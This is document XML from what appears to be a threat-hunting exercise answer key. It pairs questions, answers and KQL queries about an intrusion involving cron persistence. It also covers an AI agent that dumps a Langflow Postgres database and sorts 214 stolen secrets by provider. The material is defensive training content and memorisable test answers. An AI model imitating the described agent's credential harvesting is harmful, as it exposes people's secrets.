              <w:t xml:space="preserve">LinuxNetwork_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2A215A8D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2EC0EEFD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:20:00Z) .. datetime(2026-07-30T19:38:00Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="409B0F78">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, DstIpAddr, DstPortNumber, ActingProcessId</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="46383C77">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5343525" cy="517207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66670" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId14"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5343525" cy="51720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20.75pt;height:407.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId14" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Something is restarting that connection on a schedule. Name the mechanism, the interval, and the account that owns it.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">cron, every 30 minutes, langflow</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxAudit_CL CONFIG_CHANGE event, 19:35:54, records the crontab entry as installed with schedule */30 * * * *, written by PID 4471 under uid 999 (la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ngflow) via /usr/bin/crontab. </w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="54FD9603">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxAudit_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1FE80875">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="243E83DE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where EventOriginalMessage has "cron"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="31541915">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, AuditType, EventOriginalMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="7A4FF200">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="564449"/>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10254" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId15"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="5644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44.44pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId15" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 3: Credential Access</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A database dump ran on ff-db-01. Establish whether it was the nightly backup, and name the account that ran the one you are interested in.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">pg_dump, langflow
</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Legitimate nightly backup: LinuxProcess_CL, 19:27:04, pg_dump -U backup -h localhost -Fc flowforge, TargetUsername backup, parented by /opt/backup/run-nightly.sh, matches the known c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ron baseline. Hostile dump: LLMAgentLogs_CL, 19:25:04, agent dumps Langflow's own local Postgres backend (database langflow, not flowforge), tool_result reads dump complete, 214 secrets extracted. Account name and target database are what separate the two.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="16C50FB1">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2B8E9AC2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="69318BA8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:24:00Z) .. datetime(2026-07-30T19:31:00Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="714D9367">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response, tool_name, tool_args, tool_result</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="29EB62E4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="6400800" cy="1645427"/>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06497" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId16"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="6400799" cy="16454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504.00pt;height:129.56pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId16" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The intruder sorted what it stole in a single pass. How many distinct provider families did it come away with, and name any three.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">8, openai, anthropic, deepseek</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, 19:25:13. The agent's own classification pass over the 214 secrets pulled from Langflow's Postgres backend.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1B612EAE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="586EF02F">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0754DF88">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where tool_name == "classify secrets"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="245E64F6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response, tool_result</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="784F5EB6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| extend Tag = split(tool_result, ",")</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="03B8BABF">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| mv-expand Tag</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| extend IsNamedProvider = Tag !in ("mysql", "wallets")</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="25B339E1">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1543852"/>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99989" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId17"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
